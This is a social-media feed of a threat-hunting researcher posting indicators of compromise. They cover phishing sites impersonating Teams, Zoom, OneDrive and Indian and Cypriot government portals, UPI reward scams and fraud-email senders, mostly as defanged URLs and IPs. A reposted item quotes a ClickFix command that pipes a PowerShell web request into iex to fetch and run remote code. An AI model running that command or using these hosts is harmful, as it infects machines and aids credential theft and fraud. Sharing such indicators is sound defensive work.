Threat hunting | Malware Analysis | These views are my own and not my employers. linkedin.com/in/anurag-gawan…

Joined February 2019
295 Photos and videos
OJBK airdrop #phishing page URL: hxxps://www.meeting-join[.]live/theglobesailors[.]com/ hxxps://www.meeting-join.live/theglobesailors[.]com/walcheck/
24
#OneDrive #phishing URLs: hxxps://www.meeting-join[.]live/onedrive.online-cloud-storage[.]live/ hxxps://www.meeting-join[.]live/onedrive.online-cloud-storage[.]live/5FZT00OnlGZEF6OCZzaGFya/
1
29
#Zoom site URLs: hxxps://www.meeting-join[.]live/zoom.meeting-join[.]live/ hxxps://zoom[.]meeting-join[.]live/PWA=1&pwd=1JusNjgBdInKfqaPTtWezB0NjBdv3d/ Credentials posted to hxxps://casrccfatnzwfhnatjjw[.]supabase[.]co
1
17
Microsoft Teams The zip file has teams #phishing site pages and JS Filename: 9341439638489j9DUzuGbkzMLBYs… URLs: hxxps://www.meeting-join[.]live/teams.meeting-join[.]live/ hxxps://teams.meeting-join[.]live/join/9359296972269p1H65GxNdeiuE4wWA4W/cto/
1
1
35
While investigating a Microsoft Teams phishing page, I came across an exposed directory listing that revealed much more than a single phishing site. The root directory exposed several hosted phishing projects, including: - Microsoft Teams - Zoom - OneDrive - Cloud storage-themed lures - Additional branded phishing pages URLS: hxxps://www.meeting-join[.]live/ hxxps://www.meeting-join[.]live/teams.meeting-join[.]live/ hxxps://teams.meeting-join[.]live/join/9359296972269p1H65GxNdeiuE4wWA4W/cto/ hxxps://www.meeting-join[.]live/zoom.meeting-join[.]live/ hxxp://zoom[.]meeting-join[.]live/PWA=1&pwd=1JusNjgBdInKfqaPTtWezB0NjBdv3d/ hxxps://www.meeting-join[.]live/onedrive[.]online-cloud-storage[.]live/ hxxps://onedrive.online-cloud-storage[.]live/ hxxps://online-cloud-storage[.]live/ hxxps://www.meeting-join[.]live/theglobesailors[.]com/ hxxps://www.meeting-join[.]live/theglobesailors[.]com/walcheck/ IP: 64.187.97[.]204 #phishing @500mk500 @skocherhan @volrant136 #opendir
1
1
2
98
Anurag reposted
Fake CoinMarketCap update page executes: powershell iwr update[.]coinmarketsap[.]com | iex Stage 1 launches PS, decodes a Base64 URL, then fetches: hxxps://795n5qr4vk02wibh[.]com/run/WWboshoF app.any.run/tasks/f8b626ca-5…
2
5
751
Anurag reposted
Looks like it is detected from yesterday, plus some today's update: github.com/stamparm/maltrail…
1
2
271
Anurag reposted
Massive cluster of #clickfix spotted on @fofabot fid="MCd9dzYdNrHqbn/JxNd96w==" Most don't have the second stage working Pastebin with ~280 IOC's: pastebin.com/GBScnh8V
3
24
2,135
Anurag reposted
🚨 #Phishing #ThreatHunting | India's Birth & Death Registration (CRS) portal Tracked by @Huntio "Home | Civil Registration System | Government of India" Looks so many, which one is real @Malwarehunterr pastebin.com/JV4Mj6xe cc: @500mk500 @MichalKoczwara @malwrhunterteam
3
6
19
1,485
Suspicious website impersonating India's Birth & Death Registration (CRS) portal The site copies official Government of India branding and presents a login page likely intended to harvest credentials. IOCs: birth.5gsewa[.]cyou birth.5gsewa[.]cyou/login.php birth.5gsewa[.]cyou/csr #phishing @IndianCERT @Cyberdost
1
2
12
1,311
Suspicious website impersonating Cyprus government services and offering a fake visa status checker. The site collects passport numbers and dates of birth, then submits the data to a Supabase backend. IOCs: - gov-cy[.]online - gov-cy[.]online/visa-status -kueqnpeiatfffkvzgssv.supabase.co/rest/v1/visa_applications?select=*&passport_number=eq.<passportNumber>&date_of_birth=eq.<DOB> #phishing @NationalCsirtCy @500mk500 @skocherhan
5
261
Another variant of the same reward scam: This one swaps the government/PM reward theme for Amazon Great Indian Festival branding but uses the same scratch card reward template and UPI payment workflow. Domain: peachexch[.]info UPI ID: mswp.2520081125640710@axisbank Recipient: Prime Minister Cares #phishing #fraud #UPIfraud
1
1
293
Another government themed reward page: Domain: marathireward[.]pages[.]dev UPI ID: netc.34161FA820328AA2D2189140@mairtel #phishing #fraud #UPIfraud
1
1
1
333
Observed another government themed reward page: Domain: budgets2026[.]shop UPI ID: paytm.s1xjs63@pty #phishing #fraud #UPIfraud
1
1
1
256
The site impersonates a government reward campaign using PM Modi and BJP imagery, claiming users can receive ₹5000 for celebrating the PM's birthday. Victims are presented with a scratch card interface and redirected to a UPI payment request disguised as a reward claim. IOCs: Domain: sctchgetpaisa[.]xyz UPI ID: paytm.s28ampu@pty Transaction note: Send_to_Your_bank #phishing #fraud #UPIfraud @IndianCERT @Cyberdost
1
1
4
344
Anurag reposted
If you detect Advanced IP Scanner, stop treating it like “just recon.” It often means the attacker already has an interactive desktop session inside your network. Ransomware operators regularly use Advanced IP Scanner and Advanced Port Scanner during hands-on discovery. These are GUI tools. A hit on them can imply RDP, RMM, or VDI access is already active. I broke down the detection logic and why this matters below 👇
7
23
160
26,152
This incident has been reported to both CERTs for investigation.
1
241
Update: I received another "Reem Al Hashimy" advance-fee fraud email using the same lure and Reply-To address (reemh4463@gmail[.]com). The previous sample originated from an Israeli government health domain, while this one was sent from dding0424@seojeong[.]ac[.]kr via a Korean academic institution's mail infrastructure. Both messages passed SPF, DKIM and DMARC and contained nearly identical content. This suggests the same threat actor may be abusing compromised mail servers or user accounts across multiple organizations. IOCs: - Sender: dding0424@seojeong[.]ac[.]kr - Mail server: mail.seojeong[.]ac[.]kr - IP: 114.70.201[.]71 - Originating IP: 102.220.160[.]163 - Reply-To: reemh4463@gmail[.]com #phishing @skocherhan @500mk500
Interesting email claiming to be from "Reem Al Hashimy" arrived from an Israeli government health domain with SPF, DKIM and DMARC all passing. It appears to originate from smtp.barzi[.]health[.]gov[.]il (31.168.13[.]43), but the Reply-To points to reemh4463@gmail[.]com. Could this be a compromised account, mail server abuse, or something else? IOCs: - y@barzi.health.gov.il - reemh4463@gmail[.]com - 31.168.13[.]43 - smtp.barzi[.]health[.]gov[.]il #Phishing #Scam
1
1
2
705
"SecureDocs" document-sharing lure observed using the same phishing template across multiple domains, but with different redirect sites. One sample redirects victims to a .icu domain, while another passes a Base64-encoded email address to a separate document-viewer domain. IOCs hxxps://macalvinsreport[.]online/ hxxps://brightmsmquadrivctemprep[.]icu/?VQBdwOeh hxxps://braeburcc[.]org/ hxxps://viewdoc01-tadtb8etk[.]framedocviewer[.]online/ hxxps://e4pfwsfrw-4qu6dbcmi-surf7rhxlg[.]secure1x[.]workers[.]dev/ #phishing @500mk500 @skocherhan
1
6
554
Anurag reposted
new88[.]love indear[.]in 172[.]67[.]221[.]109:80 104[.]21[.]43[.]58:80 #Bladabindi @IndianCERT
3
8
495